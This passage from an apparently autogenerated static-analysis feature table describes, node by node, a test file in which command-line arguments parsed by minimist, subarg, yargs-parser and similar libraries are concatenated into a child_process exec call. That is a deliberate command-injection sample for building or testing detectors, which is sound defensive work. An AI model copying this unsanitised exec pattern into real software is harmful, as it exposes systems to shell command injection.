autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:28:76:32 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:28:76:32 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | CalleeFlexibleAccessPath | process.argv.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:34:76:34 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:13 | minimist | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:13 | minimist | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:13 | minimist | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:13 | minimist | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:13 | minimist | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimis ... imist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimis ... imist") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimis ... imist") | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimis ... imist") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimis ... imist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimist | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimist | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimist | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimist | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:6:78:35 | minimist | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:23 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:23 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:23 | require | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:23 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:23 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | exceptional return of require("minimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | exceptional return of require("minimist") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | exceptional return of require("minimist") | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | exceptional return of require("minimist") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | exceptional return of require("minimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:25:78:34 | "minimist" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:3 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:8 | cp.exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | exceptional return of cp.exec ... v).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | exceptional return of cp.exec ... v).foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | exceptional return of cp.exec ... v).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | exceptional return of cp.exec ... v).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | exceptional return of cp.exec ... v).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:5:79:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:5:79:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:5:79:8 | exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:5:79:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:5:79:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- minimist().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:29 | minimist | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:29 | minimist | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:29 | minimist | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:29 | minimist | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:29 | minimist | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | exceptional return of minimist(argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | exceptional return of minimist(argv) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | exceptional return of minimist(argv) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | exceptional return of minimist(argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | exceptional return of minimist(argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:39 | minimist(argv).foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | CalleeFlexibleAccessPath | minimist | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | calleeImports | minimist | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:31:79:34 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:37:79:39 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:37:79:39 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:37:79:39 | foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:37:79:39 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:37:79:39 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:11 | subarg | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:11 | subarg | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:11 | subarg | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:11 | subarg | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:11 | subarg | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| 